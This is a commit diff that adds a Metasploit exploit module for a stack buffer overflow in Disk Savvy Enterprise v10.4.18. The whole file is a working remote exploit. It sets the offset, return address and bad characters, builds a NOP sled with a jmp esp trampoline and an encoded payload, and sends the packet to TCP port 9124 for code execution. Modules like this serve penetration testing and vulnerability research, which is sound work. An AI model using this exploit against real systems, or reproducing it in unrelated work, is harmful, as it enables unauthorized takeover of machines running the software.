Disk Savvy Server Buffer Overflow

DanielRTeixeira · web-flow · commit 929027ab96c9 · 2018-02-14T20:35:32.000Z
diff --git a/modules/exploits/windows/misc/disk_savvy_adm.rb b/modules/exploits/windows/misc/disk_savvy_adm.rb
@@ -0,0 +1,76 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Disk Savvy Enterprise v10.4.18',
+      'Description'    => %q{
+        This module exploits a stack-based buffer overflow vulnerability
+        in Disk Savvy Enterprise v10.4.18, caused by improper bounds 
+        checking of the request sent to the built-in server. This module 
+        has been tested successfully on Windows 7 SP1 x86.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Daniel Teixeira'
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread'
+        },
+      'Platform'       => 'win',
+      'Payload'        =>
+        {
+          'BadChars'   => "\x00\x02\x0a\x0d\xf8",
+          'Space'      => 355
+        },
+      'Targets'        =>
+        [
+          [ 'Disk Savvy Enterprise v10.4.18',
+            {
+              'Offset' => 124,
+              'Ret'    => 0x10056d13
+            }
+          ]
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => 'Jan 31 2017',
+      'DefaultTarget'  => 0))
+
+    register_options([Opt::RPORT(9124)])
+
+  end
+
+  def exploit
+    connect
+
+    buffer = make_nops(target['Offset'])
+    buffer << "\x90\x09\xEB\x05"
+    buffer << [target.ret].pack('V')
+    buffer << make_nops(10)
+    buffer << Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,100").encode_string * 20
+    buffer << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp esp").encode_string
+    buffer << make_nops(441)
+    buffer << payload.encoded
+
+    header = "\x75\x19\xba\xab"
+    header << "\x03\x00\x00\x00"
+    header << "\x00\x40\x00\x00"
+    header << [buffer.length].pack("V")
+    header << [buffer.length].pack("V")
+    header << [buffer[-1].ord].pack("V")
+    packet = header
+    packet << buffer
+
+    sock.put(packet)
+    handler
+  end
+end
